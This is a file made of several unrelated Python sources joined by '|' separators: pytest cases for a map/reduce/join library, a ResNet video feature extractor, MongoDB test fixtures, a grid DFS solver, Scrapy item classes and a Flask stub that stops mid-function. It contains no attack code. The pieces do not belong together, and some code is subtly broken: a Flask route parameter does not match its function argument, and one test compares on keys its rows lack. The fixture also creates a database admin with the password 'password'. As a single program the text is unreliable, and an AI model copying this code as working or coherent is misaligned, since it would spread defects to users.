{'test_id': 2, 'text': 'tab\tsplitting\ttest'},
{'test_id': 3, 'text': 'more\nlines\ntest'},
{'test_id': 4, 'text': 'tricky\u00A0test'}
],
etalon=[
{'test_id': 1, 'text': 'one'},
{'test_id': 1, 'text': 'three'},
{'test_id': 1, 'text': 'two'},
{'test_id': 2, 'text': 'splitting'},
{'test_id': 2, 'text': 'tab'},
{'test_id': 2, 'text': 'test'},
{'test_id': 3, 'text': 'lines'},
{'test_id': 3, 'text': 'more'},
{'test_id': 3, 'text': 'test'},
{'test_id': 4, 'text': 'test'},
{'test_id': 4, 'text': 'tricky'}
],
cmp_keys=("test_id", "text"),
mapper_etalon_items=(0, 1, 2)
),
MapCase(
mapper=ops.Product(columns=['speed', 'distance'], result_column='time'),
data=[
{'test_id': 1, 'speed': 5, 'distance': 10},
{'test_id': 2, 'speed': 60, 'distance': 2},
{'test_id': 3, 'speed': 3, 'distance': 15},
{'test_id': 4, 'speed': 100, 'distance': 0.5},
{'test_id': 5, 'speed': 48, 'distance': 15},
],
etalon=[
{'test_id': 1, 'speed': 5, 'distance': 10, 'time': 50},
{'test_id': 2, 'speed': 60, 'distance': 2, 'time': 120},
{'test_id': 3, 'speed': 3, 'distance': 15, 'time': 45},
{'test_id': 4, 'speed': 100, 'distance': 0.5, 'time': 50},
{'test_id': 5, 'speed': 48, 'distance': 15, 'time': 720},
],
cmp_keys=("test_id", "speed", "distance", "time")
),
MapCase(
mapper=ops.Filter(condition=lambda row: row['f'] ^ row['g']),
data=[
{'test_id': 1, 'f': 0, 'g': 0},
{'test_id': 2, 'f': 0, 'g': 1},
{'test_id': 3, 'f': 1, 'g': 0},
{'test_id': 4, 'f': 1, 'g': 1}
],
etalon=[
{'test_id': 2, 'f': 0, 'g': 1},
{'test_id': 3, 'f': 1, 'g': 0}
],
cmp_keys=("test_id", "f", "g"),
mapper_etalon_items=tuple()
),
MapCase(
mapper=ops.Project(columns=['value']),
data=[
{'test_id': 1, 'junk': 'x', 'value': 42},
{'test_id': 2, 'junk': 'y', 'value': 1},
{'test_id': 3, 'junk': 'z', 'value': 144}
],
etalon=[
{'value': 42},
{'value': 1},
{'value': 144}
],
cmp_keys=("value",)
)
]
@pytest.mark.parametrize("case", MAP_CASES)
def test_mapper(case: MapCase) -> None:
mapper_data_row = copy.deepcopy(case.data[case.mapper_item])
mapper_etalon_rows = [copy.deepcopy(case.etalon[i]) for i in case.mapper_etalon_items]
key_func = _Key(*case.cmp_keys)
mapper_result = case.mapper(mapper_data_row)
assert isinstance(mapper_result, tp.Iterator)
assert sorted(mapper_etalon_rows, key=key_func) == sorted(mapper_result, key=key_func)
result = ops.Map(case.mapper)(iter(case.data))
assert isinstance(result, tp.Iterator)
assert sorted(case.etalon, key=key_func) == sorted(result, key=key_func)
@dataclasses.dataclass
class ReduceCase:
reducer: ops.Reducer
reducer_keys: tp.Tuple[str, ...]
data: tp.List[ops.TRow]
etalon: tp.List[ops.TRow]
cmp_keys: tp.Tuple[str, ...]
reduce_data_items: tp.Tuple[int, ...] = (0,)
reduce_etalon_items: tp.Tuple[int, ...] = (0,)
REDUCE_CASES = [
ReduceCase(
reducer=ops.FirstReducer(),
reducer_keys=('test_id',),
data=[
{'test_id': 1, 'text': 'hello, world'},
{'test_id': 2, 'text': 'bye!'}
],
etalon=[
{'test_id': 1, 'text': 'hello, world'},
{'test_id': 2, 'text': 'bye!'}
],
cmp_keys=("test_id", "text")
),
ReduceCase(
reducer=ops.TopN(column='rank', n=3),
reducer_keys=('match_id',),
data=[
{'match_id': 1, 'player_id': 1, 'rank': 42},
{'match_id': 1, 'player_id': 2, 'rank': 7},
{'match_id': 1, 'player_id': 3, 'rank': 0},
{'match_id': 1, 'player_id': 4, 'rank': 39},
{'match_id': 2, 'player_id': 5, 'rank': 15},
{'match_id': 2, 'player_id': 6, 'rank': 39},
{'match_id': 2, 'player_id': 7, 'rank': 27},
{'match_id': 2, 'player_id': 8, 'rank': 7}
],
etalon=[
{'match_id': 1, 'player_id': 1, 'rank': 42},
{'match_id': 1, 'player_id': 2, 'rank': 7},
{'match_id': 1, 'player_id': 4, 'rank': 39},
{'match_id': 2, 'player_id': 5, 'rank': 15},
{'match_id': 2, 'player_id': 6, 'rank': 39},
{'match_id': 2, 'player_id': 7, 'rank': 27}
],
cmp_keys=("match_id", "player_id", "rank"),
reduce_data_items=(0, 1, 2, 3),
reduce_etalon_items=(0, 1, 2)
),
ReduceCase(
reducer=ops.TermFrequency(words_column='text'),
reducer_keys=('doc_id',),
data=[
{'doc_id': 1, 'text': 'hello', 'count': 1},
{'doc_id': 1, 'text': 'little', 'count': 1},
{'doc_id': 1, 'text': 'world', 'count': 1},
{'doc_id': 2, 'text': 'little', 'count': 1},
{'doc_id': 3, 'text': 'little', 'count': 3},
{'doc_id': 3, 'text': 'little', 'count': 3},
{'doc_id': 3, 'text': 'little', 'count': 3},
{'doc_id': 4, 'text': 'little', 'count': 2},
{'doc_id': 4, 'text': 'hello', 'count': 1},
{'doc_id': 4, 'text': 'little', 'count': 2},
{'doc_id': 4, 'text': 'world', 'count': 1},
{'doc_id': 5, 'text': 'hello', 'count': 2},
{'doc_id': 5, 'text': 'hello', 'count': 2},
{'doc_id': 5, 'text': 'world', 'count': 1},
{'doc_id': 6, 'text': 'world', 'count': 4},
{'doc_id': 6, 'text': 'world', 'count': 4},
{'doc_id': 6, 'text': 'world', 'count': 4},
{'doc_id': 6, 'text': 'world', 'count': 4},
{'doc_id': 6, 'text': 'hello', 'count': 1}
],
etalon=[
{'doc_id': 1, 'text': 'hello', 'tf': approx(0.3333, abs=0.001)},
{'doc_id': 1, 'text': 'little', 'tf': approx(0.3333, abs=0.001)},
{'doc_id': 1, 'text': 'world', 'tf': approx(0.3333, abs=0.001)},
{'doc_id': 2, 'text': 'little', 'tf': approx(1.0)},
{'doc_id': 3, 'text': 'little', 'tf': approx(1.0)},
{'doc_id': 4, 'text': 'hello', 'tf': approx(0.25)},
{'doc_id': 4, 'text': 'little', 'tf': approx(0.5)},
{'doc_id': 4, 'text': 'world', 'tf': approx(0.25)},
{'doc_id': 5, 'text': 'hello', 'tf': approx(0.666, abs=0.001)},
{'doc_id': 5, 'text': 'world', 'tf': approx(0.333, abs=0.001)},
{'doc_id': 6, 'text': 'hello', 'tf': approx(0.2)},
{'doc_id': 6, 'text': 'world', 'tf': approx(0.8)}
],
cmp_keys=("doc_id", "text", "tf"),
reduce_data_items=(0, 1, 2),
reduce_etalon_items=(0, 1, 2)
),
ReduceCase(
reducer=ops.Count(column='count'),
reducer_keys=("word",),
data=[
{'sentence_id': 2, 'word': 'hell'},
{'sentence_id': 1, 'word': 'hello'},
{'sentence_id': 2, 'word': 'hello'},
{'sentence_id': 1, 'word': 'little'},
{'sentence_id': 2, 'word': 'little'},
{'sentence_id': 2, 'word': 'little'},
{'sentence_id': 1, 'word': 'my'},
{'sentence_id': 2, 'word': 'my'},
{'sentence_id': 1, 'word': 'world'},
],
etalon=[
{'count': 1, 'word': 'hell'},
{'count': 1, 'word': 'world'},
{'count': 2, 'word': 'hello'},
{'count': 2, 'word': 'my'},
{'count': 3, 'word': 'little'}
],
cmp_keys=("count", "word"),
reduce_data_items=(1, 2),
reduce_etalon_items=(2,)
),
ReduceCase(
reducer=ops.Sum(column='score'),
reducer_keys=("match_id",),
data=[
{'match_id': 1, 'player_id': 1, 'score': 42},
{'match_id': 1, 'player_id': 2, 'score': 7},
{'match_id': 1, 'player_id': 3, 'score': 0},
{'match_id': 1, 'player_id': 4, 'score': 39},
{'match_id': 2, 'player_id': 5, 'score': 15},
{'match_id': 2, 'player_id': 6, 'score': 39},
{'match_id': 2, 'player_id': 7, 'score': 27},
{'match_id': 2, 'player_id': 8, 'score': 7}
],
etalon=[
{'match_id': 1, 'score': 88},
{'match_id': 2, 'score': 88}
],
cmp_keys=("test_id", "text"),
reduce_data_items=(0, 1, 2, 3),
reduce_etalon_items=(0,)
)
]
@pytest.mark.parametrize("case", REDUCE_CASES)
def test_reducer(case: ReduceCase) -> None:
reducer_data_rows = [copy.deepcopy(case.data[i]) for i in case.reduce_data_items]
reducer_etalon_rows = [copy.deepcopy(case.etalon[i]) for i in case.reduce_etalon_items]
key_func = _Key(*case.cmp_keys)
reducer_result = case.reducer(case.reducer_keys, iter(reducer_data_rows))
assert isinstance(reducer_result, tp.Iterator)
assert sorted(reducer_etalon_rows, key=key_func) == sorted(reducer_result, key=key_func)
result = ops.Reduce(case.reducer, case.reducer_keys)(iter(case.data))
assert isinstance(result, tp.Iterator)
assert sorted(case.etalon, key=key_func) == sorted(result, key=key_func)
@dataclasses.dataclass
class JoinCase:
joiner: ops.Joiner
join_keys: tp.Sequence[str]
data_left: tp.List[ops.TRow]
data_right: tp.List[ops.TRow]
etalon: tp.List[ops.TRow]
cmp_keys: tp.Tuple[str, ...]
join_data_left_items: tp.Tuple[int, ...] = (0,)
join_data_right_items: tp.Tuple[int, ...] = (0,)
join_etalon_items: tp.Tuple[int, ...] = (0,)
JOIN_CASES = [
JoinCase(
joiner=ops.InnerJoiner(),
join_keys=('player_id',),
data_left=[
{'player_id': 1, 'username': 'XeroX'},
{'player_id': 2, 'username': 'jay'},
{'player_id': 3, 'username': 'Destroyer'},
],
data_right=[
{'game_id': 2, 'player_id': 1, 'score': 17},
{'game_id': 3, 'player_id': 1, 'score': 22},
{'game_id': 1, 'player_id': 3, 'score': 99}
],
etalon=[
{'game_id': 1, 'player_id': 3, 'score': 99, 'username': 'Destroyer'},
{'game_id': 2, 'player_id': 1, 'score': 17, 'username': 'XeroX'},
{'game_id': 3, 'player_id': 1, 'score': 22, 'username': 'XeroX'}
],
cmp_keys=("game_id", "player_id", "score", "username"),
join_data_left_items=(0,),
join_data_right_items=(0, 1),
join_etalon_items=(1, 2)
),
JoinCase(
joiner=ops.InnerJoiner(),
join_keys=('player_id',),
data_left=[
{'player_id': 0, 'username': 'root'},
{'player_id': 1, 'username': 'XeroX'},
{'player_id': 2, 'username': 'jay'}
],
data_right=[
{'game_id': 2, 'player_id': 1, 'score': 17},
{'game_id': 3, 'player_id': 2, 'score': 22},
{'game_id': 1, 'player_id': 3, 'score': 9999999}
],
etalon=[
# player 3 is unknown
# no games for player 0
{'game_id': 2, 'player_id': 1, 'score': 17, 'username': 'XeroX'},
{'game_id': 3, 'player_id': 2, 'score': 22, 'username': 'jay'}
],
cmp_keys=("game_id", "player_id", "score", "username"),
join_data_left_items=(2,),
join_data_right_items=(1,),
join_etalon_items=(1,),
),
JoinCase(
joiner=ops.OuterJoiner(),
join_keys=('player_id',),
data_left=[
{'player_id': 0, 'username': 'root'},
{'player_id': 1, 'username': 'XeroX'},
{'player_id': 2, 'username': 'jay'}
],
data_right=[
{'game_id': 2, 'player_id': 1, 'score': 17},
{'game_id': 3, 'player_id': 2, 'score': 22},
{'game_id': 1, 'player_id': 3, 'score': 9999999}
],
etalon=[
{'player_id': 0, 'username': 'root'}, # no such game
{'game_id': 1, 'player_id': 3, 'score': 9999999}, # no such player
{'game_id': 2, 'player_id': 1, 'score': 17, 'username': 'XeroX'},
{'game_id': 3, 'player_id': 2, 'score': 22, 'username': 'jay'}
],
cmp_keys=("game_id", "player_id", "score", "username"),
join_data_left_items=(0,),
join_data_right_items=tuple(),
join_etalon_items=(0,),
),
JoinCase(
joiner=ops.LeftJoiner(),
join_keys=('player_id',),
data_left=[
{'game_id': 2, 'player_id': 1, 'score': 17},
{'game_id': 3, 'player_id': 2, 'score': 22},
{'game_id': 4, 'player_id': 2, 'score': 41},
{'game_id': 1, 'player_id': 3, 'score': 0}
],
data_right=[
{'player_id': 0, 'username': 'root'},
{'player_id': 1, 'username': 'XeroX'},
{'player_id': 2, 'username': 'jay'}
],
etalon=[
# ignore player 0 with 0 games
{'game_id': 1, 'player_id': 3, 'score': 0}, # unknown player 3
{'game_id': 2, 'player_id': 1, 'score': 17, 'username': 'XeroX'},
{'game_id': 3, 'player_id': 2, 'score': 22, 'username': 'jay'},
{'game_id': 4, 'player_id': 2, 'score': 41, 'username': 'jay'}
],
cmp_keys=("game_id", "player_id", "score", "username"),
join_data_left_items=(1, 2),
join_data_right_items=(2,),
join_etalon_items=(2, 3)
),
JoinCase(
joiner=ops.RightJoiner(),
join_keys=('player_id',),
data_left=[
{'game_id': 2, 'player_id': 1, 'score': 17},
{'game_id': 5, 'player_id': 1, 'score': 34},
{'game_id': 3, 'player_id': 2, 'score': 22},
{'game_id': 4, 'player_id': 2, 'score': 41},
{'game_id': 1, 'player_id': 3, 'score': 0}
],
data_right=[
{'player_id': 0, 'username': 'root'},
{'player_id': 1, 'username': 'XeroX'},
{'player_id': 2, 'username': 'jay'}
],
etalon=[
# ignore game with unknown player 3
{'player_id': 0, 'username': 'root'}, # no games for root
{'game_id': 2, 'player_id': 1, 'score': 17, 'username': 'XeroX'},
{'game_id': 3, 'player_id': 2, 'score': 22, 'username': 'jay'},
{'game_id': 4, 'player_id': 2, 'score': 41, 'username': 'jay'},
{'game_id': 5, 'player_id': 1, 'score': 34, 'username': 'XeroX'}
],
cmp_keys=("game_id", "player_id", "score", "username"),
join_data_left_items=(2, 3),
join_data_right_items=(2,),
join_etalon_items=(2, 3)
),
JoinCase(
joiner=ops.InnerJoiner(suffix_a='_game', suffix_b='_max'),
join_keys=('player_id',),
data_left=[
{'game_id': 2, 'player_id': 1, 'score': 17},
{'game_id': 3, 'player_id': 1, 'score': 22},
{'game_id': 1, 'player_id': 3, 'score': 99}
],
data_right=[
{'player_id': 1, 'username': 'XeroX', 'score': 400},
{'player_id': 2, 'username': 'jay', 'score': 451},
{'player_id': 3, 'username': 'Destroyer', 'score': 999},
],
etalon=[
{'game_id': 1, 'player_id': 3, 'score_game': 99, 'score_max': 999, 'username': 'Destroyer'},
{'game_id': 2, 'player_id': 1, 'score_game': 17, 'score_max': 400, 'username': 'XeroX'},
{'game_id': 3, 'player_id': 1, 'score_game': 22, 'score_max': 400, 'username': 'XeroX'}
],
cmp_keys=("game_id", "player_id", "score", "username"),
join_data_left_items=(0, 1),
join_data_right_items=(0,),
join_etalon_items=(1, 2)
)
]
@pytest.mark.parametrize("case", JOIN_CASES)
def test_joiner(case: JoinCase) -> None:
joiner_data_left_rows = [copy.deepcopy(case.data_left[i]) for i in case.join_data_left_items]
joiner_data_right_rows = [copy.deepcopy(case.data_right[i]) for i in case.join_data_right_items]
joiner_etalon_rows = [copy.deepcopy(case.etalon[i]) for i in case.join_etalon_items]
key_func = _Key(*case.cmp_keys)
joiner_result = case.joiner(case.join_keys, iter(joiner_data_left_rows), iter(joiner_data_right_rows))
assert isinstance(joiner_result, tp.Iterator)
assert sorted(joiner_etalon_rows, key=key_func) == sorted(joiner_result, key=key_func)
result = ops.Join(case.joiner, case.join_keys)(iter(case.data_left), iter(case.data_right))
assert isinstance(result, tp.Iterator)
assert sorted(case.etalon, key=key_func) == sorted(result, key=key_func)
# ########## HEAVY TESTS WITH MEMORY TRACKING ##########
@pytest.fixture(scope="function")
def baseline_memory() -> tp.Generator[int, None, None]:
yield _run_watchdog(lambda: time.sleep(0.1), limit=100 * MiB, is_baseline=True)
def _run_watchdog(callback: tp.Callable[[], tp.Any], limit: int, is_baseline: bool) -> int:
thread = memory_watchdog.MemoryWatchdog(limit=limit, is_baseline=is_baseline)
thread.start()
try:
callback()
finally:
thread.stop()
thread.join()
return thread.maximum_memory_usage
def run_and_track_memory(callback: tp.Callable[[], tp.Any], limit: int) -> tp.Any:
process_memory = _run_watchdog(callback, limit=limit, is_baseline=False)
assert process_memory <= limit
def get_map_data() -> tp.Generator[tp.Dict[str, tp.Any], None, None]:
time.sleep(0.1) # Some sleep for watchdog catch the memory change
for _ in range(1000000):
yield {'data': "HE.LLO", 'n': 2}
@pytest.mark.parametrize("func_mapper, additional_memory", [
(ops.DummyMapper(), 1 * MiB), # Strange memory leap on test start
(ops.LowerCase(column='data'), 500 * KiB),
(ops.FilterPunctuation(column='data'), 500 * KiB),
(ops.Split(column='data', separator='E'), 500 * KiB),
(ops.Product(columns=['data', 'n'], result_column='prod'), 500 * KiB),
(ops.Filter(condition=lambda row: row['data'] == "HE.LLO"), 500 * KiB),
(ops.Project(columns=['data']), 500 * KiB),
])
def test_heavy_map(func_mapper: ops.Mapper, additional_memory: int, baseline_memory: int) -> None:
time.sleep(1)
op = ops.Map(func_mapper)(get_map_data())
run_and_track_memory(lambda: next(op), baseline_memory + additional_memory)
def test_heavy_split(baseline_memory: int) -> None:
func_map = ops.Split(column='data', separator='E')
record = {'data': "E" * 100500, 'n': 2}
op = func_map(record)
run_and_track_memory(lambda: next(op), baseline_memory + 500 * KiB)
def get_reduce_data() -> tp.Generator[tp.Dict[str, tp.Any], None, None]:
for letter in ["a", "b", "c", "ddd"]:
time.sleep(0.1) # Some sleep for watchdog catch the memory change
for i in range(305000):
yield {"key": letter, "value": i}
@pytest.mark.parametrize("func_reducer, additional_memory", [
(ops.FirstReducer(), 500 * KiB),
(ops.TermFrequency(words_column='key'), 500 * KiB),
(ops.Count(column='key'), 500 * KiB),
(ops.Sum(column='value'), 500 * KiB),
(ops.TopN(column='key', n=5000), 2 * MiB),
])
def test_heavy_reduce(func_reducer: ops.Reducer, additional_memory: int, baseline_memory: int) -> None:
op = ops.Reduce(func_reducer, ("key", ))(get_reduce_data())
run_and_track_memory(lambda: next(op), int(baseline_memory + additional_memory))
@pytest.mark.parametrize("func_joiner, additional_memory", [
(ops.InnerJoiner(), 100 * MiB),
(ops.LeftJoiner(), 100 * MiB),
(ops.RightJoiner(), 100 * MiB)
])
def test_heavy_join(func_joiner: ops.Joiner, additional_memory: int, baseline_memory: int) -> None:
op = ops.Join(func_joiner, ("key", ))(get_reduce_data(), get_reduce_data())
run_and_track_memory(lambda: next(op), baseline_memory + additional_memory)
def get_complexity_join_data() -> tp.Generator[tp.Dict[str, tp.Any], None, None]:
for n in range(100500):
yield {"key": n, "value": n}
@pytest.mark.parametrize("func_joiner", [
ops.InnerJoiner(),
ops.LeftJoiner(),
ops.RightJoiner()
])
def test_complexity_join(func_joiner: ops.Joiner) -> None:
list(ops.Join(func_joiner, ("key", ))(get_complexity_join_data(), get_complexity_join_data()))
|
def calcualte(num):
try:
print(100/num)
except ZeroDivisionError:
print("num value cant be zero")
finally: #It will always be printed
print("Code executes") # #Use case is it can be helpful to close the file if consumed
calcualte(1)
calcualte(0) |
'''
Extract feature vectors from video frames.
These features come from the Pool5 layers of a ResNet deep
neural network, pre-trained on ImageNet. The algorithm captures
frames directly from video, there is not need for prior frame extraction.
Copyright (C) 2019 Alexandros I. Metsai
alexmetsai@gmail.com
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 3
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>.
'''
import h5py
import os
import sys
import torch
from torchvision import transforms, models
import torch.nn as nn
import cv2
from PIL import Image
import numpy as np
class Rescale(object):
"""
Rescale an image to the given size.
Args:
output_size : Can be int or tuple. In the case a single integer
is given, PIL will resize the smallest of the original
dimensions to this value, and resize the largest dimention
such as to keep the same aspect ratio.
"""
def __init__(self, *output_size):
self.output_size = output_size
def __call__(self, image):
"""
Args:
image (PIL.Image) : PIL.Image object to rescale
"""
new_h, new_w = self.output_size
new_h, new_w = int(new_h), int(new_w)
img = image.resize((new_w, new_h), resample=Image.BILINEAR)
return img
class ResNetPool5(nn.Module):
def __init__(self, DNN='resnet101'):
"""
Load pretrained ResNet weights on ImageNet. Return the Pool5
features as output when called.
Args:
DNN (string): The DNN architecture. Choose from resnet101,
resnet50 or resnet152. ResNet50 and ResNet152 are not yet
in the release version of TorchVision, you will have to
build from source for these nets to work, or wait for the
newer versions.
"""
super().__init__()
if DNN == "resnet101":
resnet = models.resnet101(pretrained=True)
elif DNN == "resnet50":
resnet = models.resnet50(pretrained=True)
elif DNN == "resnet152":
resnet = models.resnet152(pretrained=True)
else:
print("Error. Network " + DNN + " not supported.")
exit(1)
resnet.float()
# Use GPU is possible
if torch.cuda.is_available():
resnet.cuda()
resnet.eval()
module_list = list(resnet.children())
self.conv5 = nn.Sequential(*module_list[:-2])
self.pool5 = module_list[-2]
def forward(self, x):
res5c = self.conv5(x)
pool5 = self.pool5(res5c)
pool5 = pool5.view(pool5.size(0), -1)
pool5 = pool5.cpu().data.numpy().flatten()
return pool5
# Check torchvision docs about these normalization values applied on ResNet.
# Since it was applied on training data, we should do so as well.
# Note that this transform does not cast the data first to [0,1].
# Should this action be performed? Or does this normalization make
# it uneccessary?
data_normalization = transforms.Compose([
Rescale(224, 224),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
])
if __name__=='__main__':
model = ResNetPool5()
video_folder = "videos/"
# Extract features for all the videos in the list.
for video_idx, file in enumerate(os.listdir(video_folder)):
save_path = file +".h5"
h5_file = h5py.File(save_path, 'w')
h5_file.create_group('video_{}'.format(video_idx+1))
# Empty list to append tensors to.
features_list = []
if file.endswith(".mp4"):
print("Processing " + file)
video_capture = cv2.VideoCapture(video_folder + file)
success, image = video_capture.read()
i = 1
if not success :
print("Error while reading video file.")
sys.exit(-1)
while success:
# print(i)
video_feat = None
# The video's frames are captured with cv2. OpenCV treats
# images as numpy arrays, but since PyTorch works with PIL
# images, we convert them as such.
image = Image.fromarray(image)
# Transform the data to ResNet's desired characteristics.
image = data_normalization(image)
# Add the extra "batch" dimension.
image = image.unsqueeze(0)
# Move the data to GPU and do a forward pass.
if torch.cuda.is_available():
pool5 = model.forward(image.cuda())
else:
pool5 = model.forward(image)
# Detach the tensor from the model and store it to CPU memory.
# temp = pool5.clone()
temp = pool5
# temp = temp.detach()
if torch.cuda.is_available():
temp.cpu()
# Append the tensor to the list.
features_list.append(temp)
if video_feat is None:
video_feat = features_list
else:
video_feat = np.vstack((video_feat, features_list))
# Capture the next frame.
success, image = video_capture.read()
i+=1
print(i)
# Save the list of features to pickle file.
# filename = video_folder + file[:-4] + "_features.h5"
# torch.save(features_list, filename)
# print("total number of extracted feature vectors for ", file, ":", i)
# for name in video_names:
# save_path = file +".h5"
# h5_file = h5py.File(save_path, 'w')
h5_file['video_{}'.format(video_idx+1)]['features'] = list(video_feat)
h5_file.close()
# type(features_list)
# adict=dict(video1=features_list)
# for k,v in adict.items():
# f.create_dataset(k,data=v)
# f.create_dataset('video1' + '/features', data=features_list)
# TODO:
# Need to add option to save the features on a single pickle
# file instead of a separate for each video.
# ### To form your own dataset.. for video summ.. https://github.com/KaiyangZhou/vsumm-reinforce/issues/1
# import h5py
# h5_file_name = 'vsumm_dataset.h5'
# f = h5py.File(h5_file_name, 'w')
# # video_names is a list of strings containing the
# # name of a video, e.g. 'video_1', 'video_2'
# for name in video_names:
# f.create_dataset(name + '/features', data=data_of_name)
# f.create_dataset(name + '/gtscore', data=data_of_name)
# f.create_dataset(name + '/user_summary', data=data_of_name)
# f.create_dataset(name + '/change_points', data=data_of_name)
# f.create_dataset(name + '/n_frame_per_seg', data=data_of_name)
# f.create_dataset(name + '/n_frames', data=data_of_name)
# f.create_dataset(name + '/picks', data=data_of_name)
# f.create_dataset(name + '/n_steps', data=data_of_name)
# f.create_dataset(name + '/gtsummary', data=data_of_name)
# f.create_dataset(name + '/video_name', data=data_of_name)
# f.close() |
from os import environ
import os
import json
import datetime
from configparser import ConfigParser
from kb_Metrics.metricsdb_controller import MetricsMongoDBController
from bson.objectid import ObjectId
from pymongo import MongoClient
DEBUG = False
def print_debug(msg):
if not DEBUG:
return
t = str(datetime.datetime.now())
print ("{}:{}".format(t, msg))
def setupModule():
print_debug ('MODULE - setup')
token = environ.get('KB_AUTH_TOKEN', None)
# Deploy Config
config_file = environ.get('KB_DEPLOYMENT_CONFIG', None)
cfg = {}
config = ConfigParser()
config.read(config_file)
for nameval in config.items('kb_Metrics'):
cfg[nameval[0]] = nameval[1]
# Test Config
test_cfg_file = '/kb/module/work/test.cfg'
test_cfg_text = "[test]\n"
with open(test_cfg_file, "r") as f:
test_cfg_text += f.read()
config = ConfigParser()
config.read_string(test_cfg_text)
test_cfg_dict = dict(config.items("test"))
test_cfg = test_cfg_dict
# Start and populate the test database.
init_mongodb()
def teardownModule():
print_debug('MODULE - teardown')
client = MongoClient(port=27017)
dbs = ['workspace', 'exec_engine', 'userjobstate', 'auth2', 'metrics']
for db in dbs:
try:
client[db].command("dropUser", "admin")
client.drop_database(db)
except Exception as ex:
print('ERROR dropping db: ' + str(ex))
try:
os.system("sudo service mongodb stop")
except Exception as ex:
print('ERROR stopping db: ' + str(ex))
def init_mongodb():
print_debug("MONGO - starting")
client = MongoClient(port=27017)
print_debug('starting to build local mongoDB')
os.system("sudo service mongodb start")
os.system("mongod --version")
os.system("cat /var/log/mongodb/mongodb.log "
"| grep 'waiting for connections on port 27017'")
print_debug("MONGO - ready")
insert_data(client, 'workspace', 'workspaces')
insert_data(client, 'exec_engine', 'exec_tasks')
insert_data(client, 'userjobstate', 'jobstate')
insert_data(client, 'workspace', 'workspaceObjects')
insert_data(client, 'auth2', 'users')
insert_data(client, 'metrics', 'users')
insert_data(client, 'metrics', 'daily_activities')
insert_data(client, 'metrics', 'narratives')
db_names = client.database_names()
# updating created to timstamp field for userjobstate.jobstate
for jrecord in client.userjobstate.jobstate.find():
created_str = jrecord.get('created')
updated_str = jrecord.get('updated')
client.userjobstate.jobstate.update_many(
{"created": created_str},
{"$set": {"created": datetime.datetime.utcfromtimestamp(
int(created_str) / 1000.0),
"updated": datetime.datetime.utcfromtimestamp(
int(updated_str) / 1000.0)}
}
)
# updating data fields from timstamp to datetime.datetime format
db_coll1 = client.workspace.workspaceObjects
for wrecord in db_coll1.find():
moddate_str = wrecord.get('moddate')
if type(moddate_str) not in [datetime.date, datetime.datetime]:
moddate = datetime.datetime.utcfromtimestamp(
int(moddate_str) / 1000.0)
db_coll1.update_many(
{"moddate": moddate_str},
{"$set": {"moddate": moddate}},
upsert=False
)
db_coll2 = client.workspace.workspaces
for wrecord in db_coll2.find():
moddate_str = wrecord.get('moddate')
if type(moddate_str) not in [datetime.date, datetime.datetime]:
moddate = datetime.datetime.utcfromtimestamp(
int(moddate_str) / 1000.0)
db_coll2.update_many(
{"moddate": moddate_str},
{"$set": {"moddate": moddate}},
upsert=False
)
db_coll3 = client.metrics.users
for urecord in db_coll3.find():
signup_at_str = urecord.get('signup_at')
last_signin_at_str = urecord.get('last_signin_at')
if type(signup_at_str) not in [datetime.date, datetime.datetime]:
signup_date = datetime.datetime.utcfromtimestamp(
int(signup_at_str) / 1000.0)
signin_date = datetime.datetime.utcfromtimestamp(
int(last_signin_at_str) / 1000.0)
db_coll3.update_many(
{"signup_at": signup_at_str,
"last_signin_at": last_signin_at_str},
{"$set": {"signup_at": signup_date,
"last_signin_at": signin_date}},
upsert=False
)
db_coll4 = client.metrics.narratives
for urecord in db_coll4.find():
first_acc_str = urecord.get('first_access')
last_saved_at_str = urecord.get('last_saved_at')
if type(first_acc_str) not in [datetime.date, datetime.datetime]:
first_acc_date = datetime.datetime.utcfromtimestamp(
int(first_acc_str) / 1000.0)
last_saved_date = datetime.datetime.utcfromtimestamp(
int(last_saved_at_str) / 1000.0)
db_coll4.update_many(
{"first_access": first_acc_str,
"last_saved_at": last_saved_at_str},
{"$set": {"first_access": first_acc_date,
"last_saved_at": last_saved_date}},
upsert=False
)
db_coll_au = client.auth2.users
for urecord in db_coll_au.find():
create_str = urecord.get('create')
login_str = urecord.get('login')
if type(create_str) not in [datetime.date, datetime.datetime]:
db_coll_au.update_many(
{"create": create_str, "login": login_str},
{"$set": {"create": datetime.datetime.utcfromtimestamp(
int(create_str) / 1000.0),
"login": datetime.datetime.utcfromtimestamp(
int(login_str) / 1000.0)}},
upsert=False
)
db_names = client.database_names()
for db in db_names:
if db != 'local':
client[db].command("createUser", "admin",
pwd="password", roles=["readWrite"])
def insert_data(client, db_name, table):
db = client[db_name]
record_file = os.path.join('db_files',
f'ci_{db_name}.{table}.json')
json_data = open(record_file).read()
records = json.loads(json_data)
if table == 'jobstate':
for record in records:
record['_id'] = ObjectId(record['_id'])
db[table].drop()
db[table].insert_many(records)
print_debug(f'Inserted {len(records)} records for {db_name}.{table}') |
import sys
sys.stdin = open('input.txt')
DIRS = ((-1, 0), (1, 0), (0, -1), (0, 1))
def dfs(r, c, number):
if len(number) == 7:
result.add(number)
return
for dr, dc in DIRS:
nr, nc = r + dr, c + dc
if 0 <= nr < 4 and 0 <= nc < 4:
dfs(nr, nc, number + graph[nr][nc])
for t in range(1, int(input())+1):
graph = [input().split() for _ in range(4)]
result = set()
for r in range(4):
for c in range(4):
dfs(r, c, graph[r][c])
print(f'#{t} {len(result)}')
|
from scrapy.item import Item, Field
class Company(Item):
name = Field()
logo = Field()
short_description = Field()
long_description = Field()
founded_date = Field()
category = Field()
# contact
website = Field()
blog = Field()
twitter = Field()
phone = Field()
email = Field()
# mongo item requirement
key = Field()
class Office(Item):
name = Field()
address = Field()
key = Field()
company_key = Field() #belong to which company
class Person(Item):
name = Field()
title = Field()
long_description = Field()
presence = Field()
key = Field()
company_key = Field()
|
from flask import Flask, jsonify, request,abort, make_response
from upcoming_fights import upcoming_fights as u
import json
app = Flask(__name__)
events = ['one','two','three']
with open('Data/winners.json') as json_data:
d = json.load(json_data)
@app.route('/')
def index():
return "STILL HERE!"
@app.route('/api/v1.0/getprediction/<int:task_id>', methods=['GET'])
def get_fight_by_id(fight_id):
fight = [fight for fight in u if fight['id']==fight_id]
